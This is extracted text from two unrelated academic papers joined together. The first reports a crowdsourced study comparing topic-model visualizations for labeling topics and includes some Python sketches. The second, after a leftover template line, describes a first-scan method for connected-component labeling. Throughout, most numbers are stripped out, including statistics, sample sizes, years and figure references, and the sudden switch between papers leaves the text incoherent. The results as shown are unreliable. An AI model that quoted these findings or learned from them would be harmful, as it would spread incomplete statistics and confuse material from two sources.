completed on average . hits. in the corpus. algorithmically generated labels (not sentences) are also included. figure shows an ex- ample of the validation task. the user-generated labels and sentences are eval- uated separately. for each task, the user sees the titles of the top ten documents associated with a topic and a randomized set of labels or sentences, one elicited from each of the four visualization tech- niques within a given cardinality. the set of labels also includes an algorithmically generated label. we ask the user to select the “best” and “worst” of the labels or sentences based on how well they describe the documents. documents are associated to topics based on the probability of the topic, z, given the document, d, p(z|d). only the title of each docu- ment is initially shown to the user with an option to “show article” (or view the first characters of the document). all labels are lowercased to enforce uniformity. we merge identical labels so users do not see dupli- cates. if a merged label receives a “best” or “worst” vote, the vote is split equally across all of the origi- nal instances (i.e., across multiple visualization tech- niques with that label). finally, we track task com- pletion time. each user completes four randomly selected vali- dation tasks as part of a hit, with the constraint that each task must be from a different topic. we also use ground truth seeding for quality control: each hit includes one additional test task that has a pur- posefully bad label generated by concatenating three random dictionary words. if the user does not pick the bad label as the “worst”, we discard all data in that hit. . study design and data collection for phase i, we use a factorial design with factors of visualization (levels: word list, word list with bars, word cloud, and network graph) and cardinal- ity (levels: , , and ), yielding twelve condi- tions. 
for each of the fifty topics in the model and each of the twelve conditions, at least five users per- form the labeling task, describing the topic with a label and sentence, resulting in a minimum of , label and sentence pairs. each hit includes five of these labeling tasks, for a minimum of hits. the users are paid $ . per hit. for phase ii, we compare descriptions across the four visualization techniques (and automatically generated labels), but only within a given cardinality level rather than across cardinalities. we collected , label and sentence pairs from users during phase i. for validation in phase ii, we use the first five labels and sentences collected for each condi- tion for a total of . labels and sentences. these are shown in sets of four (labels or sentences) dur- ing phase ii, yielding a total of , ( , / + , / ) tasks. each hit contains four validation tasks and one ground truth seeding task, for a to- tal of hits. to increase robustness, we validate twice for a total of hits, without allowing any two labels or sentences to be compared twice. the users get $ . per hit. results we analyze labeling time and self-reported confi- dence for the labeling task (phase i) before report- ing on the label quality assessments (phase ii). we then analyze linguistic qualities of the labels, which should motivate future work in automatic label gen- eration. (a) topic (coh. = . )(b) topic ( . ) (c) topic ( . ) (d) topic ( . ) (e) topic ( . ) (f) topic ( . ) to pi cs w / h ig h c oh er en ce to pi cs w / l ow c oh er en ce figure : word list with bar visualizations of the three best (top) and worst (bottom) topics according to their coherence score, which is shown to the right of the topic number. the average topic coherence is . (sd= . ). we first provide an example of user-generated la- bels and sentences: the user labels for the topic shown in figure include government, iraq war, politics, bush administration, and war on terror. ex- amples of sentences include “president bush’s mili- tary plan in iraq” and “world news involving the us president and iraq”. to interpret the results, it is useful to also un- derstand the quality of the generated topics, which varies throughout the model and may impact a user’s ability to generate good labels. we measure topic quality using topic coherence, an automatic measure that correlates with how much sense a topic makes to a user (lau et al., ). the average topic coher- ence for the model is . (sd = . ). figure shows the three best (top) and three worst topics (bottom) according to their observed coherence: the coherence metric distinguishes obvious topics from inscrutable ones. section . shows that users cre- the complete set of labels and sentences are available at https://github.com/alisonmsmith/papers/ tree/master/topicrepresentations. we use a reference corpus of million wikipedia arti- cles for computing normalized pointwise mutual information needed for computing the observed coherence. https://github.com/alisonmsmith/papers/tree/master/topicrepresentations https://github.com/alisonmsmith/papers/tree/master/topicrepresentations technique word list word list w/ bars word cloud network graph cardinality # tasks completed avg time (sd) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) avg confidence (sd) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . 
ated lower quality labels for low coherence topics. table : overview of the labeling phase: number of tasks completed, the average and standard deviation (in parentheses) for time spent per task in seconds, and the average and standard deviation for self-reported confidence on a -point likert scale for each of the twelve conditions. figure : average time for the labeling task (vertical axis: time in seconds), across visualizations and cardinalities, ordered from left to right by visual complexity. for words, network graph was significantly slower and word list was significantly faster than the other visualization techniques. error bars show standard error. . labeling time more complex visualization techniques take longer to label (table and figure ). the labeling tasks took on average . seconds (sd = . ) to complete, and a two-way anova (visualization technique × cardinality) reveals significant main effects for both the visualization technique and the cardinality, as well as a significant interaction effect (f( , ) = . , p < . , η p = . ; f( , ) = . , p < . , η p = . ; f( , ) = . , p < . , η p = . ). for lower cardinality, the labeling time across visualization techniques is similar, but there are notable differences for higher cardinality. posthoc pairwise comparisons based on the interaction effect (with bonferroni adjustment) found no significant differences between visualizations with five words and only one significant difference for ten words (word list with bars was slower than word cloud, p < . ). for twenty words, however, the network graph was significantly slower at an average of . s (sd = . ) than the other three visualizations (p < . ). this effect is likely due to the network graph becoming increasingly dense with more nodes (figure , bottom right). in contrast, the relatively simple word list visualization was significantly faster with twenty words than the three other visualizations (p < . ), taking only . s on average (sd = . ). word list with bars and word cloud were not significantly different from each other. as a secondary analysis, we examine the relationship between elapsed time and the observed coherence for each topic. topics with high coherence scores, for example, may be faster to label, because they are easier to interpret. however, the small negative correlation between time and coherence (figure , top) was not significant (r = −. , p = . ). . self-reported labeling confidence for each labeling task, users rate their confidence that their labels and sentences describe the topic well on a scale from (least confident) to (most confident). the average confidence across all conditions was . (sd = . ). kruskal-wallis tests show a significant impact of visualization technique on confidence with five and ten words (five words: χ = . , p = . ; ten words: χ = . , p = . ), but not twenty; we used nonparametric tests because the data is ordinal and we cannot guarantee that all differences between points on the scale are equal. while average confidence ratings across all conditions only range from . to . , perceived confidence with network graph suffers when the visualization has too few words (table ). as a secondary analysis, we compare the self-reported confidence with observed coherence for each topic (figure , bottom). increased user confidence with more coherent topics is supported by a moderate positive correlation between topic coher-
figure : relationship between observed coherence and labeling time (top) and observed coherence and self- reported confidence (bottom) for each topic. the positive correlation (slope = . and r = . ) for confidence is significant. ence and confidence (r = . , p = . ). this re- sult provides further evidence that topic coherence is an effective measurement of topic interpretability. . other users’ rating of label quality other users’ perceived quality of topic labels is the best real-world measure of quality (as described in section . ). overall, the visualization techniques had similar quality labels, but automatically gener- ated labels do not fare well. automatic labels get far fewer “best” votes and far more “worst” votes than user-generated labels produced from any of the four visualization techniques (figure ). chi-square tests on the distribution of “best” votes for labels for each cardinality show that the visualization mat- ters. posthoc analysis using pairwise chi-square five words: χ ,n= = . , p = . . ten words: χ ,n= = . , p = . . twenty words: χ ,n= = . , p < . . tests with bonferroni correction show that automatic labels were significantly worse than user-generated labels from each of the visualization techniques (all comparisons p < . ). no other pairwise compar- isons were significant. for sentences, no visualization technique emerged as better than the others. additionally, there is no existing automatic approach to compare against. the distribution of “best” counts here was relatively uniform. separate kruskal-wallis tests for each cardinality to examine the impact of the visualization techniques on “best” counts did not reveal any significant results. as a secondary qualitative analysis, we examine the relationship between topic coherence and the as- sessed quality of the labels. the automatic algorithm tended to produce better labels for the coherent top- ics than for the incoherent topics. for example, topic (figure , b)—{music, band, songs}—and topic (figure , c)—{food, restaurant, wine}— are two of the most coherent topics. the automatic algorithm labeled topic as music and topic as food. for both of these coherent topics, the labels generated by the automatic algorithm secured the most “best” votes and no “worst” votes. in contrast, topic (figure , e)—{years, home, work}—and topic (figure , f)—{death, family, board}— are two of the least coherent topics. the automatic labels refusal of work and death of michael jackson yielded the most “worst” votes and fewest “best” votes. to further demonstrate this relationship, we ex- tracted from the topics the top and bottom quar- tiles of topics each based on their observed co- herence scores. figure shows a comparison of the “best” and “worst” votes for the topic labels for these quartiles, including user-generated and auto- matically generated labels. for the top quartile, the number of “best” votes per technique ranged from for automatic labels to for the network graph visualization. the range for the bottom quartile was larger, from only “best” votes for automatic la- bels to for word list with bars. the automatic la- bels, in particular, received a large relative increase in “best” votes when comparing the bottom quartile we could not get exact quartiles, because we have top- ics, so we rounded up to include topics in each quartile. 
to the top quartile (increase of %). additionally, the word list, word cloud, and network graph visualizations all lead to labels with similar “best” and “worst” votes for both the top and bottom quartiles. however, the word list with bars representation shows both a large relative increase for the best votes (increase of %) and relative decrease for the “worst” votes (decrease of %) when comparing the top to the bottom quartile. these results suggest that adding numeric word probability information highlighted by the bars may help users understand poor quality topics. figure : the “best” and “worst” votes for labels and sentences for each condition. the automatically generated labels received more “worst” votes and fewer “best” votes compared to the user-created labels. figure : comparison of the “best” and “worst” votes for labels generated using the different visualization techniques (and the automatically generated labels) for the top quartile of topics (top) and bottom quartile of topics (bottom) by topic coherence. the automatically generated labels receive far more “best” votes for the coherent topics. . label analysis the results of phase i provide a large manually generated label set. exploratory analysis of these labels reveals linguistic features users tend to incorporate when labeling topics. we discuss implications for automatic labeling in section . in particular, users prefer shorter labels, labels that include topic words and phrases, and abstraction in topic labeling. length the manually generated labels use . words (sd = . ), and the algorithmically generated labels use . words (sd = . ). interestingly, the labels voted as “best” were shorter on average than those voted “worst” (the “best” label set includes all labels voted at least once as “best”, and similarly the “worst” label set includes all labels voted at least once as “worst”), regardless of whether algorithmically generated labels are included in the analysis. with algorithmically generated labels included, the average lengths are . (sd = . ) words for “best” labels and . (sd = . ) words for “worst” labels, but even without the algorithmically generated labels, the “best” labels are shorter (m = . , sd = . ) than the “worst” labels (m = . , sd = . ). figure : relationship between rank of topic words and the average probability of occurrences in labels. the three lines—red, green, and blue—represent cardinality of five, ten, and twenty, respectively. the higher-ranked words were used more frequently. shared topic words of the , labels, , , or %, contain at least one word taken directly from the topic words—that is, the five, ten, or twenty words shown in the visualization; however, there are no notable differences between the visualization techniques. additionally, the number of topic words included on average was similar across all three cardinalities, suggesting that users often use the same number of topic words regardless of how many were shown in the visualization. we further examine the relationship between a topic word’s rank and whether the word was selected for inclusion in the labels.
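a rough sketch of the tally behind this analysis is given below; the data structures (topics as ranked word lists, labels as plain strings) and the whitespace tokenization are assumptions for illustration, not the study's analysis code.

```python
# Illustrative tally of how often the topic word at each rank appears in the
# user-generated labels. `topics` maps a topic id to its words ordered by
# p(w|z); `labels` maps a topic id to the labels collected for that topic.
from collections import defaultdict

def rank_inclusion(topics, labels, cardinality=10):
    hits = defaultdict(int)    # rank -> number of labels containing that word
    totals = defaultdict(int)  # rank -> number of labels inspected
    for topic_id, words in topics.items():
        for label in labels.get(topic_id, []):
            label_words = set(label.lower().split())
            for rank, word in enumerate(words[:cardinality], start=1):
                totals[rank] += 1
                if word in label_words:
                    hits[rank] += 1
    return {rank: hits[rank] / totals[rank] for rank in sorted(totals)}
```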
figure shows the aver- age probability of a topic word being used in a label by the topic word’s rank. more highly ranked words were included more frequently in labels. as cardi- nality increased, the highest ranked words were also less likely to be employed, as users had more words available to them. phrases although lda makes a “bag of words” assumption when generating topics, users can recon- struct relevant phrases from the unique words. for topic , for example, all visualizations include the same topic terms. however, the network graph vi- sualization highlights the phrases “jazz singer” and “rock band” by linking their words as commonly co- occurring terms in the corpus. these phrases are not as easily discernible in the word cloud visual- ization (figure ). we compute a set of common figure : word cloud and network graph visualizations of topic . phrases such as “jazz singer” and “rock band” are obscured in the word cloud but are shown in the network graph as connected nodes. phrases by taking all bigrams and trigrams that oc- cur more than fifty and twenty times, respectively, in the nyt corpus. of the labels, contain one of these common phrases, but those generated by users with the network graph visualization contain the most phrases. labels generated in the word list ( % of the labels), word list with bars ( %), and word cloud ( %) conditions contain fewer phrases than the labels generated in the network graph condi- tion ( %). although it is not surprising that the net- work graph visualization better communicates com- mon phrases in the corpus as edges are drawn be- tween these phrases, this suggests other approaches to drawing edges. edges drawn based on sentence or document-based co-occurrence, for example, could instead uncover longer-distance dependencies be- tween words, potentially identifying distinct sub- topics with a topic. hyponymy users often prefer more general terms for labels than the words in the topic (newman et al., b). to measure this, we look for the set of unique hyponyms and hypernyms of the topic words, or those that are not themselves a topic word, that appear in the manually generated labels. we use the super-subordinate relation, which represents hypernymy and hyponymy, from wordnet (miller, ). of the , labels, include a unique hypernym and include a unique hyponym of the associated topic words found using wordnet, confirming that users are significantly more likely to produce a more generic description of the topic (χ ,n= = . , p < . ). for the more generic labels, fewer of these came from word list ( %) and more from the network graph ( %) than the other visualization techniques—word list with bars ( %) and word cloud ( %). this may mean that the network graph helps users to better under- stand the topic words as a group and therefore la- bel them using a hypernym. we also compared hy- pernym inclusion for “best” and “worst” labels: ( %) of the “best” labels included a hypernym while only ( %) of the “worst” labels included a hy- pernym. each of the visualization techniques led to approximately the same percentage of the total more specific labels. discussion although the four visualization techniques yield similar quality labels, our crowdsourced study high- lights the strengths and weaknesses of the tech- niques. it also reveals some preferred linguistic fea- tures of user-generated labels and how these differ from automatically generated labels. the trade-offs among the visualization tech- niques show that context matters. 
if efficiency is paramount, then word lists—both simple and fast— are likely best. for a cardinality of twenty words, for example, users presented with the simple word list are significantly faster at labeling than those shown the network graph visualization. at the same time, more complex visualizations expose users to multi-word expressions that the simpler visualiza- tion techniques may obscure (section . ). future work should investigate for what types of user tasks this information is most useful. there is also po- tential for misinterpretation of topic meaning when cardinality is low. users can misunderstand the topic based on the small set of words, or adjacent words can inadvertently appear to form a meaning- ful phrase, which may be particularly an issue for the word cloud. our crowdsourced study identified the “best” and “worst” labels for the topic’s documents. an addi- tional qualitative coding phase could evaluate each “worst” label to determine why, whether due to misinterpretation, spelling or grammatical errors, length, or something else. surprisingly, we found no relationship between topic coherence and labeling time (section . ). this is perhaps because not only are users quick to label topics they understand, but they also quickly give up when they have no idea what a topic is about. we do, however, find a relationship between coher- ence and confidence (section . ). this positive correlation supports topic coherence as an effective measure for human interpretability. automatically generated labels are consistently chosen as the “worst” labels, although they are com- petitive with the user-generated labels for highly coherent topics (section . ). future automatic labeling algorithms should still be robust to poor topics. algorithmically generated labels were longer and more specific than the user-generated la- bels. it is unsurprising that these automatic labels were consistently deemed the worst. users pre- fer shorter labels with more general words (e.g., hypernyms, section . ). we show specific ex- amples of this phenomenon from topic and topic . for topic —{health, drug, med- ical, research, conditions}—the algorithm gener- ated the label health care in the united states, but users preferred the less specific labels health and medical research. similarly, for topic —{league, team, baseball, players, contract}—the algorithm generated the label major league baseball on fox; users preferred simpler labels, such as baseball. au- tomatic labeling algorithms thus can be improved to focus on general, shorter labels. interestingly, sim- ple textual labels have been shown to be more ef- ficient but less effective than topic keywords (i.e., word lists) for an automatic document retrieval task (aletras and stevenson, ), highlighting the extra information present in the word lists. our find- ings show that users are also able to effectively in- terpret the word list information, as that visualiza- tion was both efficient and effective for the task of topic labeling compared to the other more complex visualizations. although we use wordnet to verify that users pre- fer more general labels, this is not a panacea, be- cause wordnet does not capture all of the general- ization users want in labels. in many cases, users use terms that synthesize relationships beyond triv- ial wordnet relationships, such as locations or en- tities. 
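a minimal sketch of the wordnet-based hypernym/hyponym check used in the hyponymy analysis above is given below, using nltk's wordnet interface; treating any hypernym or hyponym of any sense of a topic word as a match is an assumption of this sketch, not the study's exact procedure, and, as just noted, such a check misses location- and entity-style generalizations.

```python
# Check whether a label contains a hypernym (or hyponym) of a topic word via
# WordNet's super-subordinate relation. Sense disambiguation is ignored here,
# which is a simplifying assumption of this sketch.
from nltk.corpus import wordnet as wn

def related_lemmas(word, relation="hypernym"):
    lemmas = set()
    for synset in wn.synsets(word):
        related = synset.hypernyms() if relation == "hypernym" else synset.hyponyms()
        for rel_synset in related:
            lemmas.update(l.name().lower() for l in rel_synset.lemmas())
    return lemmas

def label_generalizes(label, topic_words):
    """True if the label uses a hypernym of a topic word that is not itself a topic word."""
    topic_words = {w.lower() for w in topic_words}
    hypernyms = set()
    for w in topic_words:
        hypernyms |= related_lemmas(w, "hypernym")
    return any(w in hypernyms and w not in topic_words for w in label.lower().split())
```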
for example, topic —{san, los, angeles, terms, francisco}—was consistently labeled as the location california, and topic —{open, second, final, won, williams}—which almost all users la- beled as tennis, required a knowledge of the enti- ties serena williams and the u.s. open. in addition to wordnet, an automatic labeling algorithm could use a gazetteer for determining locations from topic words and a knowledge base such as tap (guha and mccool, ), which provides a broad range of in- formation about popular culture for matching topic words to entities. conclusion and future work we present a crowdsourced user study to com- pare four topic visualization techniques—a simple ranked word list, a ranked word list with bars rep- resenting word probability, a word cloud, and a net- work graph—based on how they impact the user’s understanding of a topic. the four visualization techniques lead to similar quality labels as rated by end users. however, users label more quickly with the simple word list, yet tend to incorporate phrases and more generic terminology when using the more complex network graph. additionally, users feel more confident labeling coherent topics, and manual labels far outperform the automatically generated la- bels against which they were evaluated. automatic labeling can benefit from this research in two ways: by suggesting when to apply automatic labeling and by providing training data for improv- ing automatic labeling. while automatic labels falter compared to human labels in general, they do quite well when the underlying topics are of high qual- ity. thus, one reasonable strategy would be to use automatic labels for a portion of topics, but to use human validation to either first improve the remain- der of the topics (hu et al., ) or to provide labels (as in this study) for lower quality topics. moreover, our labels provide training data that may be use- ful for automatic labeling techniques using feature- based models (charniak, )—combining infor- mation from wikipedia, wordnet, syntax, and the underlying topics—to reproduce the types of labels and sentences created (and favored) by users. finally, our study focuses on comparing individ- ual topic visualization techniques. an open ques- tion that we do not address is whether this gen- eralizes to understanding entire topic models. in other words, simple word list visualizations are use- ful for quick and high-quality topic summarization, but does this mean that a collection of word lists— one per topic—will also be optimal when displaying the entire model? future work should look at com- paring visualization techniques for full topic model understanding. acknowledgments we would like to thank the anonymous reviewers as well as the tacl editors, timothy baldwin and lil- lian lee, for helpful comments on an earlier draft of this paper. this work was funded by nsf grant iis- . any opinions, findings, and conclusions or recommendations expressed in this material are those of the authors and do not necessarily reflect the views of the national science foundation. references nikolaos aletras and mark stevenson. . labelling topics using unsupervised graph-based methods. in proceedings of the association for computational lin- guistics. nikolaos aletras, timothy baldwin, jey han lau, and mark stevenson. . representing topics labels for exploring digital libraries. in proceedings of the ieee/acm joint conference on digital libraries. lukas barth, stephen g. kobourov, and sergey pupyrev. . 
experimental comparison of semantic word clouds. in experimental algorithms. springer. david m. blei, andrew y. ng, and michael i. jordan. . latent dirichlet allocation. journal of machine learning research, : – . david m. blei. . probabilistic topic models. com- munications of the acm, ( ): – . jordan boyd-graber, david mimno, and david newman, . care and feeding of topic models: problems, diagnostics, and improvements. crc handbooks of modern statistical methods. crc press, boca raton, florida. allison june barlow chaney and david m. blei. . visualizing topic models. in international conference on weblogs and social media. jonathan chang, jordan boyd-graber, chong wang, sean gerrish, and david m. blei. . reading tea leaves: how humans interpret topic models. in pro- ceedings of advances in neural information process- ing systems. eugene charniak. . a maximum-entropy-inspired parser. in conference of the north american chapter of the association for computational linguistics. jason chuang, christopher d. manning, and jeffrey heer. . termite: visualization techniques for as- sessing textual topic models. in proceedings of the acm conference on advanced visual interfaces. jacob eisenstein, duen horng chau, aniket kittur, and eric xing. . topicviz: interactive topic explo- ration in document collections. in international con- ference on human factors in computing systems. thomas m.j. fruchterman and edward m. reingold. . graph drawing by force-directed placement. software: practice and experience, ( ): – . matthew j. gardner, joshua lutes, jeff lund, josh hansen, dan walker, eric ringger, and kevin seppi. . the topic browser: an interactive tool for browsing topic models. in proceedings of the nips workshop on challenges of data visualization. ramanathan guha and rob mccool. . tap: a semantic web platform. computer networks, ( ): – . matthew hoffman, david m. blei, chong wang, and john paisley. . stochastic variational inference. journal of machine learning research, : – . andreas hotho, andreas nürnberger, and gerhard paass. . a brief survey of text mining. journal for computational linguistics and language technology, ( ): – . yuening hu, jordan boyd-graber, brianna satinoff, and alison smith. . interactive topic modeling. ma- chine learning, ( ): – . fred jelinek, robert l. mercer, lalit r. bahl, and james k. baker. . perplexity–a measure of the difficulty of speech recognition tasks. the journal of the acoustical society of america, (s ):s –s . lauren f. klein, jacob eisenstein, and iris sun. . exploratory thematic analysis for digitized archival collections. digital scholarship in the humanities. jon kleinberg. . an impossibility theorem for clus- tering. in proceedings of advances in neural infor- mation processing systems. jey han lau, david newman, sarvnaz karimi, and tim- othy baldwin. . best topic word selection for topic labelling. in proceedings of the association for computational linguistics. jey han lau, karl grieser, david newman, and timothy baldwin. . automatic labelling of topic models. in proceedings of the association for computational linguistics. jey han lau, david newman, and timothy baldwin. . machine reading tea leaves: automatically evaluating topic coherence and topic model quality. in proceedings of the european chapter of the associa- tion for computational linguistics. qiaozhu mei, xuehua shen, and chengxiang zhai. . automatic labeling of multinomial topic mod- els. in knowledge discovery and data mining. george a. miller. . 
wordnet: a lexical database for english. communications of the acm, ( ): – . andrew mueller. . word cloud. https:// github.com/amueller/word_cloud. david newman, jey han lau, karl grieser, and timothy baldwin. a. automatic evaluation of topic coher- ence. in conference of the north american chapter of the association for computational linguistics. david newman, youn noh, edmund talley, sarvnaz karimi, and timothy baldwin. b. evaluating topic models for digital libraries. in proceedings of the ieee/acm joint conference on digital libraries. viet-an nguyen, yuening hu, jordan boyd-graber, and philip resnik. . argviz: interactive visualiza- tion of topic dynamics in multi-party conversations. in conference of the north american chapter of the as- sociation for computational linguistics. daniel ramage, susan t. dumais, and daniel j. liebling. . characterizing microblogs with topic models. in international conference on weblogs and social media. patrick riehmann, manfred hanfler, and bernd froehlich. . interactive sankey diagrams. in ieee symposium on information visualization. eduarda mendes rodrigues, natasa milic-frayling, marc smith, ben shneiderman, and derek hansen. . group-in-a-box layout for multi-faceted anal- ysis of communities. in proceedings of the ieee con- ference on social computing. evan sandhaus. . the new york times annotated corpus ldc t . linguistic data consortium, philadelphia. ben shneiderman. . tree visualization with treemaps: a -d space-filling approach. acm trans- actions on graphics, ( ): – . carson sievert and kenneth e. shirley. . ldavis: a method for visualizing and interpreting topics. in proceedings of the workshop on interactive language learning, visualization, and interfaces. alison smith, jason chuang, yuening hu, jordan boyd- graber, and leah findlater. . concurrent visu- alization of relationships between words and topics in topic models. in proceedings of the workshop on in- teractive language learning, visualization, and inter- faces. alison smith, sana malik, and ben shneiderman. . visual analysis of topical evolution in unstructured text: design and evaluation of topicflow. in appli- cations of social media and social network analysis. alexander smola and shravan narayanamurthy. . an architecture for parallel topic models. in proceed- ings of the vldb endowment. https://github.com/amueller/word_cloud https://github.com/amueller/word_cloud hanna wallach, david mimno, and andrew mccallum. a. rethinking lda: why priors matter. in pro- ceedings of advances in neural information process- ing systems. hanna m. wallach, iain murray, ruslan salakhutdinov, and david mimno. b. evaluation methods for topic models. in proceedings of the th annual in- ternational conference on machine learning. limin yao, david mimno, and andrew mccallum. . efficient methods for topic model inference on streaming document collections. in knowledge dis- covery and data mining. ji soo yi, rachel melton, john stasko, and julie a. jacko. . dust & magnet: multivariate informa- tion visualization using a magnet metaphor. informa- tion visualization, ( ): – . ke zhai, jordan boyd-graber, nima asadi, and mo- hamad alkhouja. . mr. lda: a flexible large scale topic modeling package using variational infer- ence in mapreduce. in proceedings of the acm con- ference on world wide web. 
your paper's title starts here: please center a new connected-component labeling algorithm yuyan chao , lifeng he , kenji suzuki , qian yu , wei tang .shannxi university of science and technology, china & nagoya sangyo university, aichi, japan, chao@nagoya-su.ac.jp .aichi perfectural university, aichi, japan, helifeng@ist.aichi-pu.ac.jp .the university of chicago, chicago, usa, suzuki@uchicago.edu .nagoya institute of technology, nagoya, japan .shannxi university of science and technology, china abstract. this paper proposes a new first-scan method for two-scan labeling algorithms. in the first scan, our proposed method first scans image lines three by three with a leaving line, and for foreground pixels among each three lines, assigns them provisional labels, and finds and resolves label equivalences among them. then, it processes the leaving lines from top to bottom one by one, and for each line, assigns foreground pixels on the line provisional labels, finding and resolving label equivalences between the foreground pixels and those on the lines immediately above and below the current line. experimental results demonstrated that our method is more efficient than conventional label-equivalence- based labeling algorithms. keywords: connected component; labeling; pattern recognition . introduction labeling of connected components in a binary image is one of the most fundamental operations in pattern analysis, pattern recognition, computer (robot) vision, and machine intelligence . especially in real-time applications such as traffic-jam detection, automated surveillance, and target tracking, faster labeling algorithms are always desirable. many algorithms have been proposed for addressing this issue, because the improvement of the efficiency of labeling is critical in many applications. for ordinary computer architectures and d images, there are mainly two types of labeling algorithms: ( ) raster-scan algorithms [ - ], and ( ) label propagation algorithms [ - ]. according to experimental results on various types of images, the algorithm proposed in ref. [ ], which is an improvement on the two-scan algorithm proposed in ref. [ ], is the most efficient one, and has been used for various applications [ - ]. for convenience, we denote this algorithm as hcsi algorithm. the hcsi algorithm is a two-scan labeling algorithm. it uses equivalent label sets and a representative label table to record equivalent labels and resolve the label equivalences. for convenience, an equivalent label set with the representative label u is denoted as s(u), and the representative label of a provisional label s is t, denoted as t [s] = t. in the first scan, this algorithm uses the mask shown in fig. (a), which consists of three scanned neighbor of the current foreground pixels, to assign provisional labels to foreground pixels, and to record and resolve label equivalences. at any moment, all equivalent provisional labels are combined in a equivalent label set with the same representative label. for the case where the current foreground pixel follows a background pixel (fig. (b)), if there is no label (foreground pixel) in the mask, this means that the current foreground pixel does not connect with any scanned foreground pixel, and the current foreground pixel belongs to a new connected component. 
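the equivalent-label-set and representative-label-table bookkeeping introduced above (and elaborated in what follows) can be sketched with a small union-find structure; this is one common, illustrative realization rather than the hcsi authors' code.

```python
# Provisional-label bookkeeping for a two-scan labeling algorithm: every
# provisional label belongs to an equivalent label set with one representative
# label. A simple union-find with path halving is used here for illustration.
class LabelEquivalence:
    def __init__(self):
        self.rep = [0]          # rep[s] is the representative of label s; label 0 unused

    def new_label(self):
        m = len(self.rep)
        self.rep.append(m)      # T[m] = m, i.e., S(m) = {m}
        return m

    def find(self, s):
        while self.rep[s] != s:
            self.rep[s] = self.rep[self.rep[s]]   # path halving
            s = self.rep[s]
        return s

    def merge(self, a, b):
        ra, rb = self.find(a), self.find(b)
        if ra < rb:
            self.rep[rb] = ra   # keep the smaller label as the representative
        else:
            self.rep[ra] = rb
        return min(ra, rb)
```

with this structure, relabeling a pixel in the second scan amounts to replacing its provisional label s by find(s).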
the algorithm assigns a new provisional label m to the current foreground pixel, which is initialized to , and establishes the equivalent label set s(m)={m}; it sets the representative label table as t [m] = m, and m = m+ for later processing. otherwise, i.e., if there are some foreground pixels in the mask, all of such foreground pixels and the current foreground pixel belong to the same connected component. therefore the current foreground pixel can be assigned any of the labels in the mask. on the other hand, for the case where the current foreground pixel follows another foreground pixel (fig. (c)), the current foreground pixel can be assigned the same label of that foreground pixel. in any cases, if there are provisional labels belonging to different equivalent label sets in the mask, all provisional labels in those sets are equivalent labels, and they will be combined together. as soon as the first scan is finished, all equivalent labels of each connected component have been combined into an equivalent label set with a unique representative label. in the second scan, by replacement of each provisional label with its representative label, all foreground pixels of each connected component will be assigned a unique label. . outline of our proposed first-scan method for an n × m binary image, we use b(x, y) to denote the pixel value at (x, y) in the image, where ≤ x ≤ n, ≤ y ≤ m, and v(x, y) for the value of b(x, y). for convenience, we suppose that the value of foreground pixels is and that of background pixels is . moreover, all pixels in the edge of an image are considered to be background pixels. because we don’t make any processing for background pixels, we will not discuss the processing for background pixels. our first-scan method consists of two parts: scan -a and scan -b. in scan -a, from line , it scans image lines every four other lines, i.e., in the order of line , line , line , … (the black lines in fig. ). for each current line being processed, it assigns to the foreground pixels in the line and its neighbor lines (the gray lines in fig. ) provisional labels and resolves the label equivalences among them. by scan -a, all foreground pixels in each area consisting of black and gray lines in fig. will be assigned provisional labels, and the label equivalences among them will be resolved. fig. mask for the eight-connected connectivity. fig. first scan in our proposed method. then, scan -b scans the lines unprocessed in the scan -a (the white lines in fig. ) in the order of line , line , line , …. for each current line, it assigns to the foreground pixels in the line provisional labels and resolves the label equivalences among them and those in their neighboring lines. when scan -b is finished, all foreground pixels in the given image will be assigned provisional labels, and the label equivalences among them will be resolved, i.e., all equivalent labels will be combined into an equivalent label set with a unique representative label, similar to the result of the first scan in the hcsi algorithm. in the second scan, similar to other two-scan labeling algorithms, by replacing the provisional label of each foreground pixel with its representative label, we can complete the whole labeling process. in scan -a, our method uses the mask shown in fig. to assign to the current pixel b(x, y), its neighbor above, b(x, y− )and its neighbor below, b(x, y+ )provisional labels, and to resolve the label equivalences in the mask. the following four cases can be considered. 
case : the current pixel b(x, y) is a background pixel that follows another background pixel (fig. (b), (c), (e), (f)). when the neighbor above b(x, y- ) (the neighbor below b(x, y+ )) of the current pixel is a foreground pixel, we can process it as follows: if its neighbor left is a foreground pixel, assigning that pixel’s label to it, otherwise, assigning a new provisional label to it. fig. masks used in our proposed method for fig. cases where the current pixel is a background pixel. scan -a. in scan -a. case :the current pixel is a background pixel following a foreground pixel, i.e., b(x- , y) is a foreground pixel (fig. (a), (d)).when the neighbor above b(x, y- ) (the neighbor below, b(x, y+ )) of the current pixel is a foreground pixel, we can just assign b(x- , y)’s label to it. case :the current pixel is a foreground pixel following a background pixel (fig. (b)-(e)). the current foreground pixel and its neighbor above b(x, y- ) and neighbor below b(x, y+ ) can be processed as follows: ( ) if both of b(x- , y- ) and b(x- , y+ ) are foreground pixels, we resolve the label equivalence between the two corresponding labels, and assign their representative label to the current pixel; ( ) if either b(x- , y- ) or b(x- , y+ ) is a foreground pixel, then assigning its label to the current label;( ) if none of b(x- , y- ) and b(x- , y+ ) is a foreground pixel, then assigning a new label to the current pixel. moreover, we assign the current pixel’s label to its neighbor above (its neighbor below) if that pixel is a foreground pixel. fig. cases where the current pixel is a foreground fig. mask used for scan -b. pixel in scan -a. case : the current pixel is a foreground pixel following a foreground pixel, i.e., b(x- , y) is a foreground pixel (fig. (a)). we just assign b(x- , y)’s label to the current pixel. moreover, we assign the same label to its neighbor above (its neighbor below) if that pixel is a foreground pixel. after scan -a, from line , in the order of line , line , line , , scan -b scans the lines unprocessed in scan -a. it does nothing for background pixels. for each foreground pixel, it uses the mask shown in fig. to assign to the pixel a provisional label and resolves the label equivalences in the mask. because the foreground pixels that are connected each other in the mask, such a combination is called a connected part, belonging to the same connected component, and their provisional labels are equivalent labels and belong to the same equivalent label set; thus, a connected part can be considered as if a single foreground pixel. for this reason, checking the pixels in the mask in the order of the largest number of the neighbors of a pixel first will reduce the number of times for checking pixels in the mask; thus, it leads to efficient processing [ ]. fig. cases where the current pixel is a foreground pixel following another foreground pixel in scan -b. if the current pixel is a foreground pixel following another foreground pixel, there are nine subcases shown in fig. . 
